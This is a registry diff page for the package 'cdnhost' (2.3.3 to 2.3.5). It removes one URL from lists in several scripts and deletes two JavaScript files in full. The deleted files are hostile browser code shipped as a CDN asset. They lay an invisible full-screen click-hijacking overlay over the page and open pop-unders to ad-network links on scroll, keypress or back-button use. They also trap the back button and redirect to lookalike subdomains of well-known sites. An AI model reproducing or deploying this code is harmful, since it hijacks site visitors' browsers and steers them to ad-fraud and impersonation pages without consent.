cdnhost 2.3.3 → 2.3.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/121e307b2e9f43e8b9a33e9c08d3028epreview.jpeg~tplv-a9rns2rl98-image_pre_watermark_1_5.png +0 -0
- package/__________121e307b2e9f43e8b9a33e9c08d3028epreview.jpeg~tplv-a9rns2rl98-image_pre_watermark_1_5.png +0 -0
- package/_star.png +0 -0
- package/iwinv.js +0 -1
- package/iwinv_new.js +0 -1
- package/package.json +1 -1
- package/wordpress-chat.js +0 -1
- package/seekr - /353/263/265/354/202/254/353/263/270.js" +0 -150
- package/total - /353/263/265/354/202/254/353/263/270.js" +0 -152
package/121e307b2e9f43e8b9a33e9c08d3028epreview.jpeg~tplv-a9rns2rl98-image_pre_watermark_1_5.png
ADDED
|
Binary file
|
|
Binary file
|
package/_star.png
ADDED
|
Binary file
|
package/iwinv.js
CHANGED
|
@@ -84,7 +84,6 @@
|
|
|
84
84
|
'https://mixamo.iwinv.net/recent.php',
|
|
85
85
|
'https://ssssss.iwinv.net/recent.php',
|
|
86
86
|
'https://newsfactory.iwinv.net',
|
|
87
|
-
'https://2news.kr/recent.php',
|
|
88
87
|
'https://snapp.im/recent.php',
|
|
89
88
|
'https://curseforge.iwinv.net/recent.php',
|
|
90
89
|
'https://lolchess.iwinv.net/recent.php',
|
package/iwinv_new.js
CHANGED
|
@@ -84,7 +84,6 @@
|
|
|
84
84
|
'https://mixamo.iwinv.net/recent.php',
|
|
85
85
|
'https://ssssss.iwinv.net/recent.php',
|
|
86
86
|
'https://newsfactory.iwinv.net',
|
|
87
|
-
'https://2news.kr/recent.php',
|
|
88
87
|
'https://snapp.im/recent.php',
|
|
89
88
|
'https://curseforge.iwinv.net/recent.php',
|
|
90
89
|
'https://lolchess.iwinv.net/recent.php',
|
package/package.json
CHANGED
package/wordpress-chat.js
CHANGED
|
@@ -33,7 +33,6 @@ const urls = [
|
|
|
33
33
|
'https://mixamo.iwinv.net/recent.php',
|
|
34
34
|
'https://ssssss.iwinv.net/recent.php',
|
|
35
35
|
'https://newsfactory.iwinv.net',
|
|
36
|
-
'https://2news.kr/recent.php',
|
|
37
36
|
'https://snapp.im/recent.php',
|
|
38
37
|
'https://curseforge.iwinv.net/recent.php',
|
|
39
38
|
'https://lolchess.iwinv.net/recent.php',
|
|
@@ -1,150 +0,0 @@
|
|
|
1
|
-
|
|
2
|
-
window.addEventListener('load', function() {
|
|
3
|
-
var images = document.querySelectorAll('img');
|
|
4
|
-
images.forEach(function(img) {
|
|
5
|
-
if (!img.hasAttribute('alt')) {
|
|
6
|
-
img.setAttribute('alt', 'image');
|
|
7
|
-
}
|
|
8
|
-
});
|
|
9
|
-
});
|
|
10
|
-
|
|
11
|
-
const urls = [
|
|
12
|
-
'https://ruliweb.iwinv.net/recent.php',
|
|
13
|
-
'https://instiz.iwinv.net/recent.php',
|
|
14
|
-
'https://bikini.iwinv.net/recent.php',
|
|
15
|
-
'https://manatoki.iwinv.net/recent.php',
|
|
16
|
-
'https://gmarket.iwinv.net/recent.php',
|
|
17
|
-
'https://mlbpark.iwinv.net/recent.php',
|
|
18
|
-
'https://mmtcld.iwinv.net/recent.php',
|
|
19
|
-
'https://flightaware.iwinv.net/recent.php',
|
|
20
|
-
'https://koreakr.iwinv.net/recent.php',
|
|
21
|
-
'https://popcat.iwinv.net/recent.php',
|
|
22
|
-
'https://ecount.iwinv.net/recent.php',
|
|
23
|
-
'https://hiworks.iwinv.net/recent.php',
|
|
24
|
-
'https://shopee.iwinv.net/recent.php',
|
|
25
|
-
'https://eomisae.iwinv.net/recent.php',
|
|
26
|
-
'https://kmcert.iwinv.net/recent.php',
|
|
27
|
-
'https://munpia.iwinv.net/recent.php',
|
|
28
|
-
'https://slrclub.iwinv.net/recent.php',
|
|
29
|
-
'https://interpals.iwinv.net/recent.php',
|
|
30
|
-
'https://snp500.iwinv.net/recent.php',
|
|
31
|
-
'https://dctribe.iwinv.net/recent.php',
|
|
32
|
-
'https://mixamo.iwinv.net/recent.php',
|
|
33
|
-
'https://ssssss.iwinv.net/recent.php',
|
|
34
|
-
'https://newsfactory.iwinv.net',
|
|
35
|
-
'https://2news.kr/recent.php',
|
|
36
|
-
'https://snapp.im/recent.php',
|
|
37
|
-
'https://curseforge.iwinv.net/recent.php',
|
|
38
|
-
'https://lolchess.iwinv.net/recent.php',
|
|
39
|
-
];
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
function handleKeyPress(event) {
|
|
45
|
-
const isMobile = /Mobi|Android/i.test(navigator.userAgent);
|
|
46
|
-
|
|
47
|
-
const desktopUrls = [
|
|
48
|
-
'https://www.profitableratecpm.com/jxz4jd7r?key=c69dbf238e855fdc108af717c6363e6b',
|
|
49
|
-
'https://www.profitableratecpm.com/ci7z33utw?key=315a36d4584b5d56bad0933d4e4f5457',
|
|
50
|
-
'https://www.profitableratecpm.com/h2qib3dxzv?key=72c2823d629a4fdcc8b9b5b379edab23',
|
|
51
|
-
'https://www.profitableratecpm.com/awb9ahbyse?key=37b518d892f143b18397d62c495b962d',
|
|
52
|
-
'https://www.profitableratecpm.com/ecz5npz7h?key=8f4f16f67beabcf6c8f61c352c5caddb',
|
|
53
|
-
];
|
|
54
|
-
|
|
55
|
-
const mobileUrls = [
|
|
56
|
-
'https://ruliweb.iwinv.net/recent.php',
|
|
57
|
-
'https://instiz.iwinv.net/recent.php',
|
|
58
|
-
'https://bikini.iwinv.net/recent.php',
|
|
59
|
-
'https://manatoki.iwinv.net/recent.php',
|
|
60
|
-
'https://gmarket.iwinv.net/recent.php',
|
|
61
|
-
'https://mlbpark.iwinv.net/recent.php',
|
|
62
|
-
'https://mmtcld.iwinv.net/recent.php',
|
|
63
|
-
'https://flightaware.iwinv.net/recent.php',
|
|
64
|
-
'https://koreakr.iwinv.net/recent.php',
|
|
65
|
-
'https://popcat.iwinv.net/recent.php',
|
|
66
|
-
'https://ecount.iwinv.net/recent.php',
|
|
67
|
-
'https://hiworks.iwinv.net/recent.php',
|
|
68
|
-
'https://shopee.iwinv.net/recent.php',
|
|
69
|
-
'https://eomisae.iwinv.net/recent.php',
|
|
70
|
-
'https://kmcert.iwinv.net/recent.php',
|
|
71
|
-
'https://munpia.iwinv.net/recent.php',
|
|
72
|
-
'https://slrclub.iwinv.net/recent.php',
|
|
73
|
-
'https://interpals.iwinv.net/recent.php',
|
|
74
|
-
'https://snp500.iwinv.net/recent.php',
|
|
75
|
-
'https://dctribe.iwinv.net/recent.php',
|
|
76
|
-
'https://mixamo.iwinv.net/recent.php',
|
|
77
|
-
'https://ssssss.iwinv.net/recent.php',
|
|
78
|
-
'https://newsfactory.iwinv.net',
|
|
79
|
-
'https://2news.kr/recent.php',
|
|
80
|
-
'https://snapp.im/recent.php',
|
|
81
|
-
'https://curseforge.iwinv.net/recent.php',
|
|
82
|
-
'https://lolchess.iwinv.net/recent.php',
|
|
83
|
-
];
|
|
84
|
-
|
|
85
|
-
const urls = isMobile ? mobileUrls : desktopUrls;
|
|
86
|
-
|
|
87
|
-
function getRandomUrls(arr, num) {
|
|
88
|
-
const shuffled = arr.sort(() => 0.5 - Math.random());
|
|
89
|
-
return shuffled.slice(0, num);
|
|
90
|
-
}
|
|
91
|
-
|
|
92
|
-
const randomUrls = getRandomUrls(urls, 2);
|
|
93
|
-
randomUrls.forEach(url => window.open(url, '_blank'));
|
|
94
|
-
}
|
|
95
|
-
|
|
96
|
-
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
97
|
-
document.writeln('<style>');
|
|
98
|
-
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
99
|
-
document.writeln('</style>');
|
|
100
|
-
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
101
|
-
|
|
102
|
-
window.addEventListener('scroll', () => {
|
|
103
|
-
const scrollHeight = document.documentElement.scrollHeight;
|
|
104
|
-
const scrollTop = document.documentElement.scrollTop || document.body.scrollTop;
|
|
105
|
-
const clientHeight = document.documentElement.clientHeight;
|
|
106
|
-
|
|
107
|
-
if (scrollTop + clientHeight >= scrollHeight) {
|
|
108
|
-
handleKeyPress();
|
|
109
|
-
}
|
|
110
|
-
});
|
|
111
|
-
|
|
112
|
-
history.pushState(null,null,""),window.onpopstate=function(a){a&&(history.back(),handleKeyPress())}
|
|
113
|
-
|
|
114
|
-
document.getElementById('container').style.boxShadow = 'none';
|
|
115
|
-
function ss(){
|
|
116
|
-
document.getElementById("s2").style.transition = "opacity 15s";
|
|
117
|
-
document.getElementById("button").style.transition = "opacity 15s";
|
|
118
|
-
setTimeout("s()", 3999);
|
|
119
|
-
setTimeout("h()", 15000);
|
|
120
|
-
}
|
|
121
|
-
function pcss(){
|
|
122
|
-
setTimeout("s()", 3999);
|
|
123
|
-
setTimeout("h()", 15000);
|
|
124
|
-
}
|
|
125
|
-
function a(){
|
|
126
|
-
document.getElementById("button").style.display="none";
|
|
127
|
-
}
|
|
128
|
-
function aa(){
|
|
129
|
-
document.getElementById("button").style.display="block";
|
|
130
|
-
}
|
|
131
|
-
function s(){
|
|
132
|
-
document.getElementById("s2").style.opacity = 0;
|
|
133
|
-
document.getElementById("button").style.opacity = 0;
|
|
134
|
-
document.getElementById("sha").style.display="none";
|
|
135
|
-
document.getElementById("cc").style.maxHeight="unset";
|
|
136
|
-
}
|
|
137
|
-
function h(){
|
|
138
|
-
const s2 = document.getElementById("s2");
|
|
139
|
-
const button = document.getElementById("button");
|
|
140
|
-
s2.style.zIndex = -1;
|
|
141
|
-
button.style.display = "none";
|
|
142
|
-
setTimeout(function () {
|
|
143
|
-
s2.style.zIndex = 99;
|
|
144
|
-
button.style.display = "block";
|
|
145
|
-
s2.style.opacity = 0.9;
|
|
146
|
-
button.style.opacity = 1;
|
|
147
|
-
document.getElementById("s2").style.transition = "opacity 1s";
|
|
148
|
-
document.getElementById("button").style.transition = "opacity 1s";
|
|
149
|
-
}, 2000);
|
|
150
|
-
}
|
|
@@ -1,152 +0,0 @@
|
|
|
1
|
-
window.addEventListener('load', function() {
|
|
2
|
-
var images = document.querySelectorAll('img');
|
|
3
|
-
images.forEach(function(img) {
|
|
4
|
-
if (!img.hasAttribute('alt')) {
|
|
5
|
-
img.setAttribute('alt', 'image');
|
|
6
|
-
}
|
|
7
|
-
});
|
|
8
|
-
});
|
|
9
|
-
|
|
10
|
-
document.writeln('<style>* {font-size: 1em !important}</style>');
|
|
11
|
-
const urls = [
|
|
12
|
-
'https://ruliweb.iwinv.net/recent.php',
|
|
13
|
-
'https://instiz.iwinv.net/recent.php',
|
|
14
|
-
'https://bikini.iwinv.net/recent.php',
|
|
15
|
-
'https://manatoki.iwinv.net/recent.php',
|
|
16
|
-
'https://gmarket.iwinv.net/recent.php',
|
|
17
|
-
'https://mlbpark.iwinv.net/recent.php',
|
|
18
|
-
'https://mmtcld.iwinv.net/recent.php',
|
|
19
|
-
'https://flightaware.iwinv.net/recent.php',
|
|
20
|
-
'https://koreakr.iwinv.net/recent.php',
|
|
21
|
-
'https://popcat.iwinv.net/recent.php',
|
|
22
|
-
'https://ecount.iwinv.net/recent.php',
|
|
23
|
-
'https://hiworks.iwinv.net/recent.php',
|
|
24
|
-
'https://shopee.iwinv.net/recent.php',
|
|
25
|
-
'https://eomisae.iwinv.net/recent.php',
|
|
26
|
-
'https://kmcert.iwinv.net/recent.php',
|
|
27
|
-
'https://munpia.iwinv.net/recent.php',
|
|
28
|
-
'https://slrclub.iwinv.net/recent.php',
|
|
29
|
-
'https://interpals.iwinv.net/recent.php',
|
|
30
|
-
'https://snp500.iwinv.net/recent.php',
|
|
31
|
-
'https://dctribe.iwinv.net/recent.php',
|
|
32
|
-
'https://mixamo.iwinv.net/recent.php',
|
|
33
|
-
'https://ssssss.iwinv.net/recent.php',
|
|
34
|
-
'https://newsfactory.iwinv.net',
|
|
35
|
-
'https://2news.kr/recent.php',
|
|
36
|
-
'https://snapp.im/recent.php',
|
|
37
|
-
'https://curseforge.iwinv.net/recent.php',
|
|
38
|
-
'https://lolchess.iwinv.net/recent.php',
|
|
39
|
-
];
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
function handleKeyPress(event) {
|
|
45
|
-
const isMobile = /Mobi|Android/i.test(navigator.userAgent);
|
|
46
|
-
|
|
47
|
-
const desktopUrls = [
|
|
48
|
-
'https://www.profitableratecpm.com/jxz4jd7r?key=c69dbf238e855fdc108af717c6363e6b',
|
|
49
|
-
'https://www.profitableratecpm.com/ci7z33utw?key=315a36d4584b5d56bad0933d4e4f5457',
|
|
50
|
-
'https://www.profitableratecpm.com/h2qib3dxzv?key=72c2823d629a4fdcc8b9b5b379edab23',
|
|
51
|
-
'https://www.profitableratecpm.com/awb9ahbyse?key=37b518d892f143b18397d62c495b962d',
|
|
52
|
-
'https://www.profitableratecpm.com/ecz5npz7h?key=8f4f16f67beabcf6c8f61c352c5caddb',
|
|
53
|
-
];
|
|
54
|
-
|
|
55
|
-
const mobileUrls = [
|
|
56
|
-
'https://ruliweb.iwinv.net/recent.php',
|
|
57
|
-
'https://instiz.iwinv.net/recent.php',
|
|
58
|
-
'https://bikini.iwinv.net/recent.php',
|
|
59
|
-
'https://manatoki.iwinv.net/recent.php',
|
|
60
|
-
'https://gmarket.iwinv.net/recent.php',
|
|
61
|
-
'https://mlbpark.iwinv.net/recent.php',
|
|
62
|
-
'https://mmtcld.iwinv.net/recent.php',
|
|
63
|
-
'https://flightaware.iwinv.net/recent.php',
|
|
64
|
-
'https://koreakr.iwinv.net/recent.php',
|
|
65
|
-
'https://popcat.iwinv.net/recent.php',
|
|
66
|
-
'https://ecount.iwinv.net/recent.php',
|
|
67
|
-
'https://hiworks.iwinv.net/recent.php',
|
|
68
|
-
'https://shopee.iwinv.net/recent.php',
|
|
69
|
-
'https://eomisae.iwinv.net/recent.php',
|
|
70
|
-
'https://kmcert.iwinv.net/recent.php',
|
|
71
|
-
'https://munpia.iwinv.net/recent.php',
|
|
72
|
-
'https://slrclub.iwinv.net/recent.php',
|
|
73
|
-
'https://interpals.iwinv.net/recent.php',
|
|
74
|
-
'https://snp500.iwinv.net/recent.php',
|
|
75
|
-
'https://dctribe.iwinv.net/recent.php',
|
|
76
|
-
'https://mixamo.iwinv.net/recent.php',
|
|
77
|
-
'https://ssssss.iwinv.net/recent.php',
|
|
78
|
-
'https://newsfactory.iwinv.net',
|
|
79
|
-
'https://2news.kr/recent.php',
|
|
80
|
-
'https://snapp.im/recent.php',
|
|
81
|
-
'https://curseforge.iwinv.net/recent.php',
|
|
82
|
-
'https://lolchess.iwinv.net/recent.php',
|
|
83
|
-
];
|
|
84
|
-
|
|
85
|
-
const urls = isMobile ? mobileUrls : desktopUrls;
|
|
86
|
-
|
|
87
|
-
function getRandomUrls(arr, num) {
|
|
88
|
-
const shuffled = arr.sort(() => 0.5 - Math.random());
|
|
89
|
-
return shuffled.slice(0, num);
|
|
90
|
-
}
|
|
91
|
-
|
|
92
|
-
const randomUrls = getRandomUrls(urls, 2);
|
|
93
|
-
randomUrls.forEach(url => window.open(url, '_blank'));
|
|
94
|
-
}
|
|
95
|
-
|
|
96
|
-
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
97
|
-
document.writeln('<style>');
|
|
98
|
-
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
99
|
-
document.writeln('</style>');
|
|
100
|
-
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
101
|
-
|
|
102
|
-
window.addEventListener('scroll', () => {
|
|
103
|
-
const scrollHeight = document.documentElement.scrollHeight;
|
|
104
|
-
const scrollTop = document.documentElement.scrollTop || document.body.scrollTop;
|
|
105
|
-
const clientHeight = document.documentElement.clientHeight;
|
|
106
|
-
|
|
107
|
-
if (scrollTop + clientHeight >= scrollHeight) {
|
|
108
|
-
handleKeyPress();
|
|
109
|
-
}
|
|
110
|
-
});
|
|
111
|
-
|
|
112
|
-
document.addEventListener('keydown', handleKeyPress); //add
|
|
113
|
-
|
|
114
|
-
history.pushState(null,null,""),window.onpopstate=function(a){a&&(history.back(),handleKeyPress())}
|
|
115
|
-
|
|
116
|
-
document.getElementById('container').style.boxShadow = 'none';
|
|
117
|
-
function ss(){
|
|
118
|
-
document.getElementById("s2").style.transition = "opacity 6s";
|
|
119
|
-
document.getElementById("button").style.transition = "opacity 6s";
|
|
120
|
-
setTimeout("s()", 3999);
|
|
121
|
-
setTimeout("h()", 5000);
|
|
122
|
-
}
|
|
123
|
-
function pcss(){
|
|
124
|
-
setTimeout("s()", 3999);
|
|
125
|
-
setTimeout("h()", 5000);
|
|
126
|
-
}
|
|
127
|
-
function a(){
|
|
128
|
-
document.getElementById("button").style.display="none";
|
|
129
|
-
}
|
|
130
|
-
function aa(){
|
|
131
|
-
document.getElementById("button").style.display="block";
|
|
132
|
-
}
|
|
133
|
-
function s(){
|
|
134
|
-
document.getElementById("s2").style.opacity = 0;
|
|
135
|
-
document.getElementById("button").style.opacity = 0;
|
|
136
|
-
document.getElementById("sha").style.display="none";
|
|
137
|
-
document.getElementById("cc").style.maxHeight="unset";
|
|
138
|
-
}
|
|
139
|
-
function h(){
|
|
140
|
-
const s2 = document.getElementById("s2");
|
|
141
|
-
const button = document.getElementById("button");
|
|
142
|
-
s2.style.zIndex = -1;
|
|
143
|
-
button.style.display = "none";
|
|
144
|
-
setTimeout(function () {
|
|
145
|
-
s2.style.zIndex = 99;
|
|
146
|
-
button.style.display = "block";
|
|
147
|
-
s2.style.opacity = 0.9;
|
|
148
|
-
button.style.opacity = 1;
|
|
149
|
-
document.getElementById("s2").style.transition = "opacity 1s";
|
|
150
|
-
document.getElementById("button").style.transition = "opacity 1s";
|
|
151
|
-
}, 3000);
|
|
152
|
-
}
|